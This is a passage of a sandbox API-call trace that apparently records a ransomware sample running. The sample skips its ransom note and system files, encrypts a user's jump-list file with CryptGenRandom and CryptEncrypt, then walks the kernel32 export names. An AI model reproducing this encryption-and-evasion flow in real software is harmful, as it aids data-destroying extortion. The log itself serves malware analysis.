(lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="autorun.inf") returned 1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="boot.ini") returned 1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="desktop.ini") returned 1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="iconcache.db") returned -1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="bootsect.bak") returned 1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="thumbs.db") returned -1 [0080.066] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms", lpString2="Bootfont.bin") returned 1 [0080.066] lstrlenW (lpString="eb282ead62b4db87.automaticDestinations-ms") returned 41 [0080.066] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="lnk") returned -1 [0080.066] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="exe") returned -1 [0080.066] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="sys") returned -1 [0080.066] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="dll") returned -1 [0080.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0080.066] lstrlenW (lpString="eb282ead62b4db87.automaticDestinations-ms") returned 41 [0080.066] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0080.066] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="eb282ead62b4db87.automaticDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" [0080.066] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.067] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=3584) returned 1 [0080.067] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.068] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.068] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.068] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.068] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.069] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.069] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.069] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.070] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.070] CloseHandle (hObject=0x464) returned 1 [0080.070] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.070] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.071] CloseHandle (hObject=0x0) returned 0 [0080.071] CloseHandle (hObject=0x460) returned 1 [0080.072] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.072] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.072] GetTickCount () returned 0x114c820 [0080.072] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.072] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.072] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.073] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.073] lstrlenA (lpString="kernel32.dll") returned 12 [0080.073] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.073] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.073] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.073] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.073] lstrlenA (lpString="ADDATOMA") returned 8 [0080.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.073] lstrlenA (lpString="ADDATOMW") returned 8 [0080.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.073] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.073] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.073] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.074] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.074] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.074] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.074] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.074] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.074] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.074] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.074] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.074] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.074] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.074] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.074] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.074] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.074] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.074] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.074] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.074] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.074] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.074] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.075] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.075] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.075] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.075] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.075] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.075] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.075] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.075] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.075] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.075] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.075] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.075] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.075] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.075] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.075] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.075] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.075] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.075] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.075] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.076] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.076] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.076] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.076] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.076] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.076] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.076] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.076] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.076] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.076] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.076] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.076] lstrlenA (lpString="BEEP") returned 4 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.076] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.076] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.076] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.076] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.076] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.076] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.077] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.077] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.077] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.077] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.077] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.077] lstrlenA (lpString="CANCELIO") returned 8 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.077] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.077] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.077] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.077] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.077] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.077] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.077] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.077] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.077] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.077] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.077] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.077] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.077] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.078] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.078] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.078] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.078] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.078] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.078] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.078] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.078] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.078] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.078] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.078] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.078] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: 